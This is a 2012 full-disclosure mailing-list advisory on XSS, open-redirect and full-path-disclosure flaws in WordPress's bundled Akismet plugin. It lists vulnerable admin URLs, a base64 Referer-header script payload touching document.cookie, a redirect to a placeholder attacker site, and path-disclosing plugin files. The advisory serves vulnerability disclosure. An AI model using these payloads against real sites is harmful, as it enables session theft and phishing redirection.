XSS, Redirector and FPD vulnerabilities in WordPress

["MustLive" <mustlive () websecurity com ua>]

Hello list!

In June I've disclosed vulnerabilities in WordPress, which I'd present for 
you. They take place in plugin Akismet for WordPress and it's core-plugin 
(since version WP 2.0), so these vulnerabilities concern WordPress itself. 
This is the first in series of advisories concerning vulnerabilities in 
Akismet.

These are Cross-Site Scripting, Redirector and Full path disclosure 
vulnerabilities.

-------------------------
Affected products:
-------------------------

Vulnerable are Akismet 2.5.6 and previous versions and WordPress 2.0 - 
3.4.1. Akismet 2.5.6 is bundled with the last versions 3.4 and 3.4.1 of 
WordPress.

----------
Details:
----------

XSS (WASC-08):

At GET request to script 
http://site/wp-admin/edit.php?page=akismet-admin&recheckqueue=1 or 
http://site/wp-admin/edit-comments.php?page=akismet-admin&recheckqueue=1 or 
http://site/wp-admin/admin.php?action=akismet_recheck_queue (depending on 
version, in WP 3.x the last address is used).

With setting of Referer header. This can be done via Flash or other methods. 
Last year I've wrote the article XSS attacks via User-Agent header 
(http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2011-June/007909.html) 
and almost all of these methods can be used for Referer header.

Referer: 
data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ+

At IIS web servers the redirect is going via Refresh header, and at other 
web servers - via Location header.

Redirector (URL Redirector Abuse) (WASC-38):

At GET request to script 
http://site/wp-admin/edit.php?page=akismet-admin&recheckqueue=1 or 
http://site/wp-admin/edit-comments.php?page=akismet-admin&recheckqueue=1 or 
http://site/wp-admin/admin.php?action=akismet_recheck_queue (depending on 
version, in WP 3.x the last address is used).

With setting of Referer header. This can be done via Flash or other methods.

Referer: http://attackers_site

In WP <= 2.0.11 (Akismet <= 2.0.2) via error in the plugin the XSS and 
Redirector attacks don't work, but they do work with newer versions of the 
plugin in different versions of WordPress (before 3.4).

At that in the last version Akismet 2.5.6 (which bundled with WP 3.4 and 
3.4.1) these two vulnerabilities are fixed already (at that hiddenly, 
without any mentioning in readme.txt of the plugin or in announcements of 
WP). It looks like it has happened after my March or April advisory about 
XSS and Redirector vulnerabilities via redirectors in WP.

Full path disclosure (WASC-13):

Via above-mentioned error in the plugin the XSS and Redirector attacks don't 
work, but has place FPD at request to script (in old versions of Akismet, 
such as 2.0.2).

http://site/wp-admin/edit.php?page=akismet-admin&recheckqueue=1 or 
http://site/wp-admin/edit-comments.php?page=akismet-admin&recheckqueue=1 
(depending on version of WP).

Full path disclosure (WASC-13):

If previous FPD has place in the account, then these FPD don't require 
authorization.

http://site/wp-content/plugins/akismet/admin.php

http://site/wp-content/plugins/akismet/akismet.php

http://site/wp-content/plugins/akismet/legacy.php

http://site/wp-content/plugins/akismet/widget.php

------------
Timeline:
------------

2012.02.23 - found vulnerabilities in Akismet 2.5.3. Later tested in other 
versions of the plugin from different versions of WordPress.
2012.06.29 - disclosed at my site (http://websecurity.com.ua/5933/).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua 


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/